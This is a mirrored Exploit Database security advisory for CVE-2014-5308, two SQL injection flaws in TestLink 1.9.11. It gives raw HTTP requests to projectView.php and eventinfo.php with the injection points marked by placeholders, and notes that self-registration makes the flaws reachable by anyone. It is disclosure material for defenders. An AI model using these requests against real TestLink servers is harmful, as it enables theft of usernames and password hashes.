TestLink 1.9.11 – Multiple SQL Injections

• Exploit Database
• 49 阅读

• 作者： Portcullis
  日期： 2014-10-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/34863/

• Vulnerability title: Multiple SQL Injection Vulnerabilities in TestLink
  CVE: CVE-2014-5308
  Vendor: Testlink
  Product: TestLink
  Affected version: 1.9.11
  Fixed version: Fixed in SVN commit number 7a09973
  Reported by: Jerzy Kramarz
  
  Details:
  
  Two SQL injection vulnerabilities have been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from Multiple SQL injections:
  
  Vulnerability 1 (Fixed in commit #7a09973 in official repository)
  
  <pre>
  
  POST /testlink/lib/project/projectView.php?doAction=search HTTP/1.1
  Host: 192.168.56.101
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  DNT: 1
  Referer: http://192.168.56.101/testlink/lib/project/projectEdit.php
  Cookie: [...]
  Connection: keep-alive
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 200
  
  CSRFName=CSRFGuard_1740781925&CSRFToken=b16[...]&name=<SQL Injection>&search=Search%2FFilter
  
  </pre>
  
  Vulnerability 2 (Fixed in patches after commit #7a09973 in official repository)
  
  <pre>
  
  POST /testlink/lib/events/eventinfo.php HTTP/1.1
  Content-Length: 6
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip,deflate
  Host: 192.168.56.101
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
  DNT: 1
  Connection: close
  Referer: http://192.168.56.101/testlink/lib/events/eventviewer.php
  Pragma: no-cache
  Cache-Control: no-cache
  X-Requested-With: XMLHttpRequest
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  Cookie: [...] ys-edit_tc_tproject_id_1_ext-comp-1001=a%3As%253A/1; ys-tl_table_eventviewer={"columns":[{"id":1,"width":217,"hidden":true,"sortable":true}],"sort":{"field":"id_th_timestamp","direction":"DESC"},"group":"id_th_loglevel","filters":{}}
  
  id=123<SQL Injection>
  
  </pre>
  
  Note:'Any user can create account for the application in 'testlink/firstLogin.php' page hence its possible to exploit aforementioned SQL injections without prior knowledge of the authentication details.'
  
  Further details at:
  
  https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-5308/
  
  
  Copyright:
  Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.
  
  Disclaimer:
  The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.